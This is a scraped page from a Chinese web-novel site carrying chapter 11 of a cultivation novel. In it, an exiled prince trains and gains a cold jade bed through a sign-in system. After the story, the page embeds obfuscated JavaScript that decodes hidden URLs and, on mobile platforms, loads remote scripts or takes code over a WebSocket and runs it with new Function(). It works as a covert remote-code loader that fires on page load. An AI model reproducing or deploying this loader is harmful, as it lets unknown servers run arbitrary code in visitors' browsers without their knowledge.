笔趣阁

字:
关灯 护眼
笔趣阁 > 冷宫签到八十年,我举世无敌 > 第十一章 皇帝驾崩

第十一章 皇帝驾崩

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
签到得来的无畏狮子印,让蔺九凤多了一门强悍的武学,可以增加自己的实力。
  之前他只有几门剑法,但是现在也有其他手段了,算是一个底牌。
  签到完毕,蔺九凤就进入冷宫,大门一关,谁也不知道他出去过。
  至于外界的纷纷扰扰,都和蔺九凤无关。
  一连七天过去了,蔺九凤都在默默地修行,提升自己的潜力,专心的签到凝元丹,争取早日突破金丹,进入宗师境界。
  如果是以前进入宗师,那算是一方高手,但是现在武圣已经出现,宗师也不算什么了。
  这一天,大春来了。
  带着美味的佳肴,可口的美酒,在冷宫门前如往常一样,和蔺九凤说着一些帝都内发生的事情。
  “殿下,现在魔门的人已经退走,道门和佛门的人也都陆续离开,帝都的百姓又恢复安静的生活。”大春说道。
  “好事。”蔺九凤喝一口美酒,道。
  “殿下,我听说之前因为花间老祖要来刺杀陛下,几大藩王也蠢蠢欲动,试图颠覆羽化神朝,但是现在他们都安静下来,全部都上表忠诚。”大春说道。
  “没有武圣境界的实力,他们可不敢起兵造反。”蔺九凤毫不在意,这些藩王是早年陪伴羽化神朝打天下的忠臣,后来管理一方,但是他们的后代可不这么想。
  现在九大藩王已经成了羽化神朝的心腹大患,以前当太子的时候,蔺九凤也很操心。
  但现在这些轮不到他操心,是六皇子和当今陛下操心的事情。
  他安安心心签到就好了。
  吃饱喝足,大春离开,蔺九凤生活很平静,安静的修行。
  至于无名,他虽然因为幽冥控尸法复活,诞生了新的意识,但原则上他可不是‘人’,他只是一个听命蔺九凤的傀儡罢了。
  有武圣境界的修为,可永远无法提升,而且平日里蔺九凤不吩咐他办事,他可以在棺材里一直躺下去。
  日复一日的签到,蔺九凤也不全部签到凝元丹,他在整座冷宫里闲逛。
  这一日,他来到了一座废弃的宫殿。
  乾元殿!
  这座大殿里关押的就是当初和当今陛下争夺皇位的两兄弟,也就是蔺九凤的叔叔。
  他们郁郁而终后,这里也就荒废了,没有人过来打理,现在早就荒草遍地,蛛网密布,宫殿倒塌,断壁残垣,难以落脚。
  蔺九凤来到这里,看着难以落脚的地方,无奈的一道剑气横扫,清理了杂草。
  【是否在乾元殿签到?】
  一行字出现在眼前。
  “签到!”蔺九凤毫不犹豫道。
  他想看看能签到什么东西?
  【签到成功,获得千年寒玉床!】
  蔺九凤惊喜的看着这行字,立马回到自己的院子,果不其然,在他的院子里,有一个寒气冻人的寒玉床,不算大,单人床而已。
  这可是千年的寒玉床,对修行的人来说是大补的物品,在寒玉床上修行,可以锁住肉体,吸收灵气,事半功倍。
  “有了这个寒玉床,我的宗师之路,不远矣。”蔺九凤欢喜道,当即把寒玉床搬进房间,就在上面开始修行起来。
  果不其然,一天顶过去的三天。
  这已经很快了,蔺九凤每天除非签到,其他时间都在寒玉床上修行。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDA4NQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x4d\x4a\x52\x5a\x74\x53\x42\x70\x63\x77']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vYWpmMmpkajlmajI5LmJiZGlhbbnppc2h1LmNvbbQ==','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};